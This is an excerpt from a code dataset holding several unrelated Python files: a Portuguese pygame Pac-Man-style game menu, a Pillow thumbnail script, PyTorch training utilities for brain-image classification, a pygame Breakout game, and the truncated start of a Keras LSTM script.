teclado_e_mouse(self):\r\n pos_mouse = pygame.mouse.get_pos()\r\n self.mouse_rect = pygame.Rect(pos_mouse[0],pos_mouse[1],5,5)\r\n\r\n for evento in pygame.event.get():\r\n if evento.type == QUIT:\r\n pygame.quit()\r\n sair()\r\n elif evento.type == KEYDOWN:\r\n if evento.key == K_ESCAPE:\r\n pygame.quit()\r\n sair()\r\n if self.estado == 'MP':\r\n if evento.key == K_UP:\r\n if self.pos_it > 1:\r\n self.pos_it -= 1\r\n else:\r\n self.pos_it = 5\r\n if evento.key == K_DOWN:\r\n if self.pos_it < 5:\r\n self.pos_it += 1\r\n else:\r\n self.pos_it = 1\r\n if evento.key == K_RETURN:\r\n if self.pos_it > 1:\r\n self.estado = ['MI','MO','MR','MC'][self.pos_it-2]\r\n if self.estado == 'MO':\r\n pygame.mouse.set_visible(1)\r\n else:\r\n pygame.mixer.music.stop()\r\n self.sair = True\r\n else:\r\n if evento.key == K_BACKSPACE or evento.key == K_TAB:\r\n self.estado = 'MP'\r\n pygame.mouse.set_visible(0)\r\n elif evento.type == MOUSEBUTTONDOWN:\r\n if evento.button == 1:\r\n if self.estado == 'MO':\r\n if self.mouse_rect.colliderect([40,200,25,25]):\r\n self.escolha_teclas_movimentos = 1\r\n self.teclas_config[1] = K_UP\r\n self.teclas_config[2] = K_RIGHT\r\n self.teclas_config[3] = K_LEFT\r\n if self.mouse_rect.colliderect([40,350,25,25]):\r\n self.escolha_teclas_movimentos = 2\r\n self.teclas_config[1] = K_w\r\n self.teclas_config[2] = K_d\r\n self.teclas_config[3] = K_a\r\n if self.mouse_rect.colliderect([240,200,25,25]):\r\n self.escolha_teclas_atirar = 1\r\n self.teclas_config[0] = K_SPACE\r\n if self.mouse_rect.colliderect([240,350,25,25]):\r\n self.escolha_teclas_atirar = 2\r\n self.teclas_config[0] = K_RETURN\r\n if self.mouse_rect.colliderect([430, 200, 25, 25]):\r\n self.escolha_som = 1\r\n pygame.mixer.music.play(-1)\r\n if self.mouse_rect.colliderect([430, 250, 25, 25]):\r\n self.escolha_som = 2\r\n pygame.mixer.music.pause()\r\n\r\n def sair1(self):\r\n return self.sair\r\n\r\n def teclas_escolhidas(self):\r\n return self.teclas_config\r\n \r\n def atualiza(self):\r\n pass\r\n \r\n def desenha_menu_principal(self,tela):\r\n tela.blit(titulo_jogo, (130, 80))\r\n tela.blit(fonte[5].render(\"JOGAR\",True,(0,0,0) if self.pos_it != 1 else (255,25,0)),(270,250))\r\n tela.blit(fonte[5].render(\"INSTRUÇÕES\",True,(0,0,0) if self.pos_it != 2 else (255,25,0)),(230,310))\r\n tela.blit(fonte[5].render(\"CONFIGURAÇÕES\",True,(0,0,0) if self.pos_it != 3 else (255,25,0)),(198,370))\r\n tela.blit(fonte[5].render(\"RECORDES\",True,(0,0,0) if self.pos_it != 4 else (255,25,0)),(245,430))\r\n tela.blit(fonte[5].render(\"CRÉDITOS\",True,(0,0,0) if self.pos_it != 5 else (255,25,0)),(245,490))\r\n\r\n if self.movimento_boca_pacmenu < 10:\r\n self.movimento_boca_pacmenu += 1\r\n else:\r\n self.movimento_boca_pacmenu = 0\r\n\r\n if self.movimento_boca_pacmenu == 10:\r\n if self.pacmenu_ind < 3:\r\n self.pacmenu_ind += 1\r\n else:\r\n self.pacmenu_ind = 0\r\n\r\n tela.blit(pacman_menu[self.pacmenu_ind], (130, 185+self.pos_it*60))\r\n \r\n def desenha_menu_instrucoes(self,tela):\r\n tela.blit(background_submenu, (0,0))\r\n tela.blit(titulo_instrucoes, (195,35))\r\n tela.blit(maca_img, (150,185))\r\n tela.blit(pera_img, (50,220))\r\n tela.blit(botoes_opc1 if self.escolha_teclas_movimentos == 1 else botoes_opc2, (100,365))\r\n tela.blit(botao_espaco if self.escolha_teclas_atirar == 1 else botao_enter, (420,365))\r\n tela.blit(fonte[2].render(\"Para cumprir cada fase, o jogador deverá capturar a chave que\", True, (0,0,20)),(40,120))\r\n tela.blit(fonte[2].render(\"abre a passagem para a próxima etapa.\", True, (0,0,20)),(20,150))\r\n tela.blit(fonte[2].render(\"- permite ao Superpac atirar.\", True, (20,0,0)),(180,187))\r\n tela.blit(fonte[2].render(\"- mantém os fantasmas inativos temporariamente.\", True, (20,20,0)),(80,222))\r\n tela.blit(fonte[11].render(\"Controles\", True, (0,0,0)),(270,270))\r\n tela.blit(fonte[2].render(\"Teclas para movimentar\", True, (0,10,10)),(50,305))\r\n tela.blit(fonte[2].render(\"o Superpac:\", True, (0,10,10)),(95,330))\r\n pygame.draw.line(tela, (0,0,0), (330, 310), (330, 460), 1)\r\n tela.blit(fonte[2].render(\"Tecla para atirar:\", True, (0,10,10)),(390,305))\r\n tela.blit(fonte[1].render(\"BACKSPACE/TAB -> Voltar ao menu principal\", True, (50,0,0)), (110,490))\r\n\r\n def desenha_menu_configuracoes(self,tela):\r\n tela.blit(background_submenu, (0,0))\r\n tela.blit(titulo_configuracoes, (145,35))\r\n tela.blit(fonte[0].render(\"Movimentos\",True,(0,0,128)),(65,140))\r\n tela.blit(botoes_opc1, (80, 200))\r\n tela.blit(botoes_opc2, (80, 350))\r\n pygame.draw.line(tela, (0,0,0), (220, 140), (220, 420), 1)\r\n tela.blit(fonte[0].render(\"Atira\",True,(0,0,128)),(295,140))\r\n tela.blit(botao_espaco, (280, 200))\r\n tela.blit(botao_enter, (300, 350))\r\n pygame.draw.line(tela, (0,0,0), (410, 140), (410, 420), 1)\r\n tela.blit(fonte[0].render(\"Som\",True,(0,0,128)),(495,140))\r\n tela.blit(fonte[1].render(\"Ligado\",True,(50,0,0)),(475,200))\r\n tela.blit(fonte[1].render(\"Desligado\",True,(50,0,0)),(475,250))\r\n tela.blit(fonte[1].render(\"BACKSPACE/TAB -> Voltar ao menu principal\", True, (50,0,0)), (110,490))\r\n\r\n pygame.draw.rect(tela, (0,0,0), (40, 200, 25, 25), 2)\r\n pygame.draw.rect(tela, (0,0,0), (40, 350, 25, 25), 2)\r\n pygame.draw.rect(tela, (0,0,0), (240, 200, 25, 25), 2)\r\n pygame.draw.rect(tela, (0,0,0), (240, 350, 25, 25), 2)\r\n pygame.draw.rect(tela, (0,0,0), (430, 200, 25, 25), 2)\r\n pygame.draw.rect(tela, (0,0,0), (430, 250, 25, 25), 2)\r\n\r\n tela.blit(escolha, (40,200) if self.escolha_teclas_movimentos == 1 else (40,350))\r\n tela.blit(escolha, (240,200) if self.escolha_teclas_atirar == 1 else (240,350))\r\n tela.blit(escolha, (430,200) if self.escolha_som == 1 else (430,250))\r\n\r\n def desenha_menu_recordes(self,tela):\r\n tela.blit(background_submenu, (0,0))\r\n tela.blit(titulo_recordes, (210,35))\r\n\r\n tela.blit(fonte[6].render(\"Posição\", True, (50,0,0)),(50,120))\r\n tela.blit(fonte[6].render(\"Jogador\", True, (0,50,0)),(250,120))\r\n tela.blit(fonte[6].render(\"Pontuação\", True, (0,0,50)),(450,120))\r\n tela.blit(fonte[1].render(\"BACKSPACE/TAB -> Voltar ao menu principal\", True, (50,0,0)), (110,490))\r\n\r\n try:\r\n arq = open('recordes.dat','r')\r\n recordistas = []\r\n for linha in arq:\r\n linha = linha.strip()\r\n recordistas.append([linha.split(\"|\")[0],linha.split(\"|\")[1]])\r\n \r\n tela.blit(fonte[7].render(\"1º\", True, (50,0,0)),(83,190))\r\n if len(recordistas[0][0]) < 10 and len(recordistas[0][0]) > 5:\r\n a = len(recordistas[0][0])-1\r\n elif len(recordistas[0][0]) == 10:\r\n a = len(recordistas[0][0]) \r\n else:\r\n a = 5\r\n tela.blit(fonte[7].render(recordistas[0][0], True, (0,50,0)),(190+360/a,190))\r\n tela.blit(fonte[7].render(recordistas[0][1], True, (0,0,50)),(520-10*len(recordistas[0][1]),190))\r\n\r\n tela.blit(fonte[7].render(\"2º\", True, (50,0,0)),(83,260))\r\n if len(recordistas[1][0]) < 10 and len(recordistas[1][0]) > 5:\r\n b = len(recordistas[1][0])-1\r\n elif len(recordistas[1][0]) == 10:\r\n b = len(recordistas[1][0]) \r\n else:\r\n b = 5\r\n tela.blit(fonte[7].render(recordistas[1][0], True, (0,50,0)),(190+360/b,260))\r\n tela.blit(fonte[7].render(recordistas[1][1], True, (0,0,50)),(520-10*len(recordistas[1][1]),260))\r\n \r\n tela.blit(fonte[7].render(\"3º\", True, (50,0,0)),(83,330))\r\n if len(recordistas[2][0]) < 10 and len(recordistas[2][0]) > 5:\r\n c = len(recordistas[2][0])-1\r\n elif len(recordistas[2][0]) == 10:\r\n c = len(recordistas[2][0]) \r\n else:\r\n c = 5\r\n tela.blit(fonte[7].render(recordistas[2][0], True, (0,50,0)),(190+360/c,330))\r\n tela.blit(fonte[7].render(recordistas[2][1], True, (0,0,50)),(520-10*len(recordistas[2][1]),330))\r\n \r\n tela.blit(fonte[7].render(\"4º\", True, (50,0,0)),(83,400))\r\n if len(recordistas[3][0]) < 10 and len(recordistas[3][0]) > 5:\r\n d = len(recordistas[3][0])-1\r\n elif len(recordistas[3][0]) == 10:\r\n d = len(recordistas[3][0]) \r\n else:\r\n d = 5\r\n tela.blit(fonte[7].render(recordistas[3][0], True, (0,50,0)),(190+360/d,400))\r\n tela.blit(fonte[7].render(recordistas[3][1], True, (0,0,50)),(520-10*len(recordistas[3][1]),400))\r\n \r\n arq.close()\r\n except:\r\n arq = open('recordes.dat','w')\r\n arq.writelines((\"**********|0\\n\",\r\n \"**********|0\\n\",\r\n \"**********|0\\n\",\r\n \"**********|0\\n\"))\r\n arq.close()\r\n\r\n arq = open('recordes.dat','r')\r\n recordistas = []\r\n for linha in arq:\r\n linha = linha.strip()\r\n recordistas.append([linha.split(\"|\")[0],linha.split(\"|\")[1]])\r\n arq.close()\r\n \r\n def desenha_menu_creditos(self,tela):\r\n tela.blit(background_submenu, (0,0))\r\n tela.blit(titulo_creditos, (210,35))\r\n\r\n tela.blit(fonte[11].render(\"Desenvolvido por:\", True, (0,0,0)),(210,120))\r\n tela.blit(fonte[10].render(\"Felipe Araújo de Andrade\", True, (0,0,20)),(175,170))\r\n tela.blit(fonte[10].render(\"(araujoandrade.flp@gmail.com)\", True, (20,0,0)),(140,210))\r\n tela.blit(fonte[11].render(\"Sobre o jogo:\", True, (0,0,0)),(240,275))\r\n tela.blit(fonte[2].render(\"SUPERPAC é um jogo de plataforma no estilo pacman.\", True, (0,20,20)),(75,315))\r\n tela.blit(fonte[2].render(\"Para encontrar a Pacwoman, o Superpac terá que atravessar\", True, (0,20,0)),(66,345))\r\n tela.blit(fonte[2].render(\"um mundo perigoso, cheio de fantasmas e precipícios, e derrotar\", True, (0,20,0)),(20,375))\r\n tela.blit(fonte[2].render(\"o terrível Evilpac.\", True, (0,20,0)),(20,405))\r\n tela.blit(fonte[1].render(\"BACKSPACE/TAB -> Voltar ao menu principal\", True, (50,0,0)), (110,490))\r\n \r\n def desenha(self,tela):\r\n tela.fill((0,0,0))\r\n tela.blit(pygame.transform.scale(background_menu,(655,555)),(0,0))\r\n\r\n if self.estado == 'MP':\r\n self.desenha_menu_principal(tela)\r\n elif self.estado == 'MI':\r\n self.desenha_menu_instrucoes(tela)\r\n elif self.estado == 'MO':\r\n self.desenha_menu_configuracoes(tela)\r\n elif self.estado == 'MR':\r\n self.desenha_menu_recordes(tela)\r\n elif self.estado == 'MC':\r\n self.desenha_menu_creditos(tela)\r\n\r\ndef main():\r\n jogo = Jogo()\r\n jogo.init_fase1()\r\n menu = Menu()\r\n menu.init_musica()\r\n estado = 'M'\r\n superpac = menu\r\n \r\n while True:\r\n superpac.teclado_e_mouse()\r\n superpac.atualiza()\r\n superpac.desenha(tela)\r\n\r\n pygame.display.flip()\r\n\r\n if superpac.sair1():\r\n if estado == 'M':\r\n estado = 'J'\r\n jogo.__init2__(superpac.teclas_escolhidas(), 2-superpac.escolha_som)\r\n superpac = jogo\r\n else:\r\n jogo.__init__()\r\n jogo.init_fase1()\r\n menu.sair = False\r\n estado = 'M'\r\n menu.init_musica()\r\n superpac = menu\r\n \r\n\r\nmain()\r\n\r\n","sub_path":"testing/SuperPac/SuperPac.py","file_name":"SuperPac.py","file_ext":"py","file_size_in_byte":97819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"549140874","text":"from PIL import Image\nimport os\n\nsize_300 = (300,300)\nfor f in os.listdir('.'):\n if f.endswith('.jpg'):\n i = Image.open(f)\n fn, fext1 = os.path.splitext(f)\n\n i.thumbnail(size_300)\n i.save('300/{}_300{}'.format(fn, fext1))\n\n\n# for f in os.listdir('.'):\n# if f.endswith('.jpg'):\n# i = Image.open(f)\n# fn, fext = os.path.splitext(f)\n# i.save('PNGs/{}.png'.format(fn))\n\n\n# image1 = Image.open('Marina Beach.jpg') #Creating Image object\n# image1.show()\n# image1.save('Marina Beach.png') #Rename image file\n\n","sub_path":"Pillow - Image Manipulation/Pillow_demo.py","file_name":"Pillow_demo.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"257099264","text":"from PIL import Image\r\nimport numpy as np\r\nimport os\r\nimport logging\r\n\r\nimport torch\r\nimport torchvision.transforms as transforms\r\nfrom torch.utils.data.sampler import SubsetRandomSampler\r\nfrom torch.utils.data import Dataset\r\n\r\nformatter = logging.Formatter(fmt = '%(asctime)s - %(levelname)s - %(message)s', datefmt='%H:%M:%S')\r\nstream_handler = logging.StreamHandler()\r\nstream_handler.setFormatter(formatter)\r\n\r\nlogger = logging.getLogger()\r\nlogger.addHandler(stream_handler)\r\nlogger.setLevel(logging.DEBUG)\r\n\r\ndevice = torch.device(\"cuda:0\")\r\n\r\nclass brain_Dataset(Dataset):\r\n def __init__ (self, data, transform=None):\r\n self.data = data\r\n self.transform = transform\r\n \r\n def __len__(self):\r\n return len(self.data[1])\r\n \r\n def __getitem__(self, index):\r\n img = self.data[0][index]\r\n label = self.data[1][index]\r\n \r\n if self.transform:\r\n img = self.transform(img)\r\n \r\n return img, label\r\n\r\ndef read_images(directory, img_size):\r\n logging.info('pytorch_utils.read_images')\r\n\r\n list_img = []\r\n labels = []\r\n\r\n for name in os.listdir(directory + 'yes'):\r\n img = Image.open(directory + 'yes/'+ name)\r\n img = img.resize((img_size, img_size))\r\n list_img.append(np.asarray(img))\r\n labels.append(1)\r\n \r\n for name in os.listdir(directory + 'no'):\r\n img = Image.open(directory + 'no/'+ name)\r\n img = img.resize((img_size, img_size))\r\n list_img.append(np.asarray(img))\r\n labels.append(0)\r\n\r\n return list_img, labels\r\n\r\ndef create_dataloader(directory, img_size, batch_size, transforms = None, validation_split = 0.2):\r\n logging.info('pytorch_utils.create_dataloader')\r\n\r\n list_img, labels = read_images(directory, img_size)\r\n dataset = brain_Dataset([list_img, labels], transforms)\r\n\r\n data_size = len(list_img)\r\n validation_split = validation_split\r\n split = int(np.floor(validation_split * data_size))\r\n indices = list(range(data_size))\r\n np.random.shuffle(indices)\r\n\r\n train_indices, val_indices = indices[split:], indices[:split]\r\n\r\n train_sampler = SubsetRandomSampler(train_indices)\r\n val_sampler = SubsetRandomSampler(val_indices)\r\n\r\n train_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, \r\n sampler=train_sampler)\r\n val_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,\r\n sampler=val_sampler)\r\n\r\n return train_loader, val_loader\r\n\r\ndef compute_accuracy(model, val_loader):\r\n model.eval() # Evaluation mode\r\n \r\n correct_samples = 0\r\n total_samples = 0\r\n \r\n for i_step, (x, y) in enumerate(val_loader):\r\n x_gpu = x.to(device, dtype=torch.float)\r\n y_gpu = y.to(device, dtype=torch.long)\r\n\r\n predictions = model(x_gpu)\r\n _, indices = torch.max(predictions, 1)\r\n\r\n correct_samples += torch.sum(indices == y_gpu)\r\n total_samples += y.shape[0]\r\n \r\n accuracy = float(correct_samples)/total_samples \r\n \r\n return accuracy\r\n\r\ndef train_model(model, train_loader, val_loader, loss, optimizer, num_epochs):\r\n logging.info('pytorch_utils.train_model')\r\n\r\n train_history = []\r\n val_history = []\r\n \r\n for epoch in range(num_epochs):\r\n model.train() # Enter train mode \r\n\r\n correct_samples = 0\r\n total_samples = 0\r\n\r\n for i_step, (x, y) in enumerate(train_loader):\r\n x_gpu = x.to(device, dtype=torch.float)\r\n y_gpu = y.to(device, dtype=torch.long)\r\n\r\n prediction = model(x_gpu) \r\n loss_value = loss(prediction, y_gpu)\r\n optimizer.zero_grad()\r\n loss_value.backward()\r\n optimizer.step()\r\n \r\n _, indices = torch.max(prediction, 1)\r\n\r\n correct_samples += torch.sum(indices == y_gpu)\r\n total_samples += y.shape[0]\r\n\r\n train_accuracy = float(correct_samples) / total_samples\r\n val_accuracy = compute_accuracy(model, val_loader)\r\n\r\n train_history.append(train_accuracy)\r\n val_history.append(val_accuracy)\r\n \r\n logging.info('Epochs: %d, Train accuracy: %f, Val accuracy: %f', epoch, train_accuracy, val_accuracy)\r\n \r\n return train_history, val_history","sub_path":"webservices/CNN_medium/pytorch_utils.py","file_name":"pytorch_utils.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"55544297","text":"import random\n\nimport pygame\n\npygame.init()\n\n# Define screen size\nSCREEN_WIDTH = 900\nSCREEN_HEIGHT = 700\n\n# Define background color\nbackground_color = (234, 218, 184)\nbackground_sky_image = pygame.image.load('img/sky.png')\nbackground_sky_rect = background_sky_image.get_rect()\nx = 0\nbackground_sun_image = pygame.image.load('img/sun.png')\n\n# Define block color\nblock_red = (242, 85, 96)\nblock_green = (86, 174, 87)\nblock_blue = (69, 177, 232)\n\n# Define paddle color\npaddle_color = (142, 135, 123)\npaddle_outline = (100, 100, 100)\n\n# Define text color\ntext_color = (78, 81, 139)\n# Define game variables\n# cols = random.randint(1, 10)\n# rows = random.randint(1, 10)\ncols = 14\nrows = 4\nclock = pygame.time.Clock()\nFPS = 60\nlive_ball = False\ngame_over = 0\nMENU = True\nrandom_numbers = []\n\n# Define button image\nrestart_img = pygame.image.load('img/restart_btn.png')\nrestart_img = pygame.transform.scale(restart_img, (restart_img.get_width() * 2, restart_img.get_height() * 2))\nstart_img = pygame.image.load('img/start_btn.png')\nexit_img = pygame.image.load('img/exit_btn.png')\n\n\ndef draw_text(text, font, text_color, x, y):\n img = font.render(text, True, text_color)\n screen.blit(img, (x, y))\n\n\n# brick wall class\nclass Wall():\n def __init__(self, width, height, rows, cols):\n self.width = width\n self.height = height\n self.rows = rows\n self.cols = cols\n\n def create_wall(self):\n self.block = []\n # define an empty list for an individual block\n block_individual = []\n for row in range(self.rows):\n # reset the block row list\n block_row = []\n # iterate through each column in that row\n for col in range(self.cols):\n # generate x and y positions for each block and create a rectangle from that\n block_x = col * self.width\n block_y = random.randint(row, self.rows) * self.height\n rect = pygame.Rect(block_x, block_y + 50, self.width, self.height)\n # assign block strength based on row\n # if row < 2:\n # strength = 3\n # elif row < 4:\n # strength = 2\n # elif row < 6:\n # strength = 1\n # create a list at this point to store the rect and colour data\n strength = random.randint(1, 3)\n block_individual = [rect, strength]\n # append that individual block to the block row\n block_row.append(block_individual)\n # append the row to the full list of blocks\n self.block.append(block_row)\n\n def draw_wall(self):\n for row in self.block:\n for block in row:\n # assign a colour based on block strength\n if block[1] == 3:\n block_col = block_blue\n elif block[1] == 2:\n block_col = block_green\n elif block[1] == 1:\n block_col = block_red\n pygame.draw.rect(screen, block_col, block[0])\n pygame.draw.rect(screen, background_color, (block[0]), 2)\n\n\nclass Paddle():\n def __init__(self, width, height, speed, score, level, life):\n self.width = width\n self.height = height\n self.x = (SCREEN_WIDTH // 2) - (self.width // 2)\n self.y = SCREEN_HEIGHT - (self.height * 2)\n self.speed = speed\n self.rect = pygame.Rect(self.x, self.y, self.width, self.height)\n self.direction = 0\n self.score = score\n self.level = level\n self.life = life\n\n def move(self):\n # Reset movement direction\n self.direction = 0\n key = pygame.key.get_pressed()\n if (key[pygame.K_LEFT] or key[pygame.K_a]) and self.rect.left > 0:\n self.rect.x -= self.speed\n self.direction = -1\n if (key[pygame.K_RIGHT] or key[pygame.K_d]) and self.rect.right < SCREEN_WIDTH:\n self.rect.x += self.speed\n self.direction = 1\n\n def draw_paddle(self):\n pygame.draw.rect(screen, paddle_color, self.rect)\n pygame.draw.rect(screen, paddle_outline, self.rect, 3)\n\n def reset(self, width, height, speed, score, level, life):\n self.__init__(width, height, speed, score, level, life)\n\n\nclass Ball():\n def __init__(self, x, y, radius, speed_x, speed_y, speed_max, game_over):\n self.x = x - radius\n self.y = y\n self.radius = radius\n self.rect = pygame.Rect(self.x, self.y, self.radius * 2, self.radius * 2)\n self.speed_x = speed_x\n self.speed_y = speed_y\n self.speed_max = speed_max\n self.game_over = game_over\n self.score = 0\n\n def move(self):\n # collision threshold\n collision_thresh = 5\n\n # start off with the assumption that the wall has been destroyed completely\n wall_destroyed = 1\n row_count = 0\n for row in wall.block:\n item_count = 0\n for item in row:\n # check collision\n if self.rect.colliderect(item[0]):\n ball_sound.play()\n # check if collision was from above\n if abs(self.rect.bottom - item[0].top) < collision_thresh and self.speed_y > 0:\n self.speed_y *= -1\n paddle.score += 10\n # check if collision was from below\n if abs(self.rect.top - item[0].bottom) < collision_thresh and self.speed_y < 0:\n self.speed_y *= -1\n paddle.score += 10\n # check if collision was from left\n if abs(self.rect.right - item[0].left) < collision_thresh and self.speed_x > 0:\n self.speed_x *= -1\n paddle.score += 10\n # check if collision was from right\n if abs(self.rect.left - item[0].right) < collision_thresh and self.speed_x < 0:\n self.speed_x *= -1\n paddle.score += 10\n # reduce the block's strength by doing damage to it\n if wall.block[row_count][item_count][1] > 1:\n wall.block[row_count][item_count][1] -= 1\n else:\n wall.block[row_count][item_count][0] = (0, 0, 0, 0)\n\n # check if block still exists, in which case the wall is not destroyed\n if wall.block[row_count][item_count][0] != (0, 0, 0, 0):\n wall_destroyed = 0\n # increase item counter\n item_count += 1\n # increase row counter\n row_count += 1\n # after iterating through all the blocks, check if the wall is destroyed\n if wall_destroyed == 1:\n self.game_over = 1\n paddle.level += 1\n paddle.life += 1\n wall.rows += 1\n wall.cols += 1\n wall.width = SCREEN_WIDTH // wall.cols\n\n # check for collision with walls\n if self.rect.left < 0 or self.rect.right > SCREEN_WIDTH:\n self.speed_x *= -1\n\n # check for collision with top and bottom of the screen\n if self.rect.top < 0:\n self.speed_y *= -1\n if self.rect.bottom > SCREEN_HEIGHT:\n self.game_over = -1\n paddle.life -= 1\n\n # look for collission with paddle\n if self.rect.colliderect(paddle):\n ball_sound.play()\n # check if colliding from the top\n if abs(self.rect.bottom - paddle.rect.top) < collision_thresh and self.speed_y > 0:\n self.speed_y *= -1\n self.speed_x += paddle.direction\n if self.speed_x > self.speed_max:\n self.speed_x = self.speed_max\n elif self.speed_x < 0 and self.speed_x < -self.speed_max:\n self.speed_x = -self.speed_max\n else:\n self.speed_x *= -1\n\n self.rect.x += self.speed_x\n self.rect.y += self.speed_y\n\n return self.game_over\n\n def draw(self):\n pygame.draw.circle(screen, paddle_color, (self.rect.x + self.radius, self.rect.y + self.radius),\n self.radius)\n pygame.draw.circle(screen, paddle_outline, (self.rect.x + self.radius, self.rect.y + self.radius),\n self.radius, 3)\n\n def reset(self, x, y, radius, speed_x, speed_y, speed_max, game_over):\n self.__init__(x, y, radius, speed_x, speed_y, speed_max, game_over)\n\n\nclass Button():\n def __init__(self, x, y, image):\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.clicked = False\n\n def draw(self):\n action = False\n # Get mouse position\n pos = pygame.mouse.get_pos()\n # Check mouseover and clicked conditions\n if self.rect.collidepoint(pos):\n if pygame.mouse.get_pressed()[0] == 1 and not self.clicked:\n action = True\n self.clicked = True\n if pygame.mouse.get_pressed()[0] == 0:\n self.clicked = False\n\n screen.blit(self.image, self.rect)\n return action\n\n\n# Create a wall\nwall = Wall(50, 30, 1, SCREEN_WIDTH // random.randint(10, 30))\nwall.create_wall()\n\n# Create a paddle\npaddle = Paddle(100, 20, 8, 0, 1, 1)\n\n# Create a ball\nball = Ball(paddle.x + (paddle.width // 2), paddle.y - paddle.height, 10, 4, -4, 5, 0)\n\n# Create a button\nrestart_button = Button(SCREEN_WIDTH // 2 - 130, SCREEN_HEIGHT // 2, restart_img)\nstart_button = Button(SCREEN_WIDTH // 2 - 150, SCREEN_HEIGHT // 2 - 180, start_img)\nexit_button = Button(SCREEN_WIDTH // 2 - 130, SCREEN_HEIGHT // 2 + 80, exit_img)\n\n# Create ball bounce sound\nrunning_sound = pygame.mixer.Sound('audio/musicbackground.wav')\nball_sound = pygame.mixer.Sound('audio/bounce.wav')\nwinning_sound = pygame.mixer.Sound('audio/win.wav')\nlosing_sound = pygame.mixer.Sound('audio/lose.wav')\nwin_play_sound = 0\nlose_play_sound = 0\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"BREAKOUT\")\nlogo_icon = pygame.image.load('img/Breakout/Icons/logo.jpg').convert_alpha()\npygame.display.set_icon(logo_icon)\n\n# Define font\nfont = pygame.font.SysFont('Constantia', 30)\nrun = True\n\n\ndef draw_text(text, font, text_color, x, y):\n img = font.render(text, True, text_color)\n screen.blit(img, (x, y))\n\n\nmax_level = 5\n\nwhile run:\n\n clock.tick(FPS)\n screen.fill(background_color)\n running_sound.play()\n\n if MENU:\n rel_x = x % background_sky_image.get_rect().width\n screen.blit(background_sky_image, (rel_x - background_sky_image.get_rect().width, 0))\n if rel_x < SCREEN_WIDTH:\n screen.blit(background_sky_image, (rel_x, 0))\n x -= 5\n # screen.blit(background_sky_image, background_sky_rect.move(-background_sky_rect.width, 0))\n # background_sky_rect.move_ip(5, 0)\n # if background_sky_rect.left == SCREEN_WIDTH:\n # background_sky_rect.x = 0\n screen.blit(background_sun_image, (SCREEN_WIDTH - 100, 50))\n if exit_button.draw():\n run = False\n if start_button.draw():\n MENU = False\n else:\n # Draw objects\n running_sound.stop()\n wall.draw_wall()\n paddle.draw_paddle()\n ball.draw()\n score = font.render(f\"Score: {paddle.score}\", True, (0, 0, 0))\n screen.blit(score, (0, 0))\n life = font.render(f\"Lives: {paddle.life}\", True, (0, 0, 0))\n screen.blit(life, (SCREEN_WIDTH // 2 - 50, 0))\n if paddle.level <= max_level:\n level = font.render(f\"Level: {paddle.level}\", True, (0, 0, 0))\n screen.blit(level, (SCREEN_WIDTH - 100, 0))\n if live_ball:\n\n paddle.move()\n game_over = ball.move()\n if game_over != 0:\n live_ball = False\n if not live_ball:\n if game_over == 0:\n draw_text(\"Press enter or space to play\", font, text_color, 230, SCREEN_HEIGHT // 2)\n elif game_over == 1:\n if paddle.level <= max_level:\n draw_text(f\"Next level: {paddle.level}\", font, text_color, 300, SCREEN_HEIGHT // 2 - 50)\n draw_text(\"Press enter or space to continue\", font, text_color, 170,\n SCREEN_HEIGHT // 2)\n else:\n draw_text(\"You won\", font, text_color, 350, SCREEN_HEIGHT // 2 - 50)\n draw_text(\"Press enter or space to play again\", font, text_color, 200,\n SCREEN_HEIGHT // 2)\n if not win_play_sound:\n winning_sound.play()\n win_play_sound = 1\n elif game_over == -1:\n if not lose_play_sound:\n losing_sound.play()\n lose_play_sound = 1\n if restart_button.draw():\n if paddle.life > 0:\n ball.reset(paddle.x + (paddle.width // 2), paddle.y - paddle.height, 10, 4, -4, 5, 0)\n paddle = Paddle(100, 20, 8, paddle.score, paddle.level, paddle.life)\n wall.create_wall()\n losing_sound.stop()\n game_over = 0\n if paddle.life == 0:\n ball.reset(paddle.x + (paddle.width // 2), paddle.y - paddle.height, 10, 4, -4, 5, 0)\n paddle = Paddle(100, 20, 8, 0, 1, 1)\n wall.rows = 1\n wall.cols = random.randint(3, 6)\n wall.width = SCREEN_WIDTH // wall.cols\n wall.create_wall()\n game_over = 0\n losing_sound.stop()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n run = False\n if (event.type == pygame.KEYDOWN and (\n event.key == pygame.K_RETURN or event.key == pygame.K_SPACE or event.key == pygame.K_KP_ENTER)) \\\n and not live_ball and game_over != -1:\n live_ball = True\n ball.reset(paddle.x + (paddle.width // 2), paddle.y - paddle.height, 10, 4, -4, 5, 0)\n if game_over == 1 and paddle.level <= max_level:\n wall.create_wall()\n paddle = Paddle(100, 20, 8, paddle.score, paddle.level, paddle.life)\n if paddle.level > max_level:\n MENU = True\n wall.rows = 1\n wall.cols = random.randint(3, 6)\n wall.width = SCREEN_WIDTH // wall.cols\n wall.create_wall()\n paddle = Paddle(100, 20, 8, 0, 1, 1)\n winning_sound.stop()\n win_play_sound = 0\n lose_play_sound = 0\n pygame.display.update()\npygame.quit()\n","sub_path":"Breakout.py","file_name":"Breakout.py","file_ext":"py","file_size_in_byte":15106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"267792110","text":"# LSTM model generation based on the passed params\n# Shekoofeh Azizi @ UBC-RCL 18-Feb-2017\n\nimport numpy\nfrom keras.models import Sequential\nfrom keras.layers import LSTM\nimport matplotlib.pyplot as plt\nimport scipy.io as spio\nfrom keras.models import load_model\nimport keras.backend as K\nplt.ion()\n\n#direc = '/home/shekoofeh/data/LSTM_Keras/Datasets/Series' #Server\ndirec = '/media/sf_Host_Share/tscRF_LSTM/MATLAB/Data Preparation/Datasets/Series' #VirtualBox\ndataset = 'tsc_Sliding'\n\n# Initializing a few constant param\nsl = 100\n\n# Load data\nprint(\"Loading is inputs ......\")\n\ndatadir = direc + '/' + dataset + '/'\nX_train = 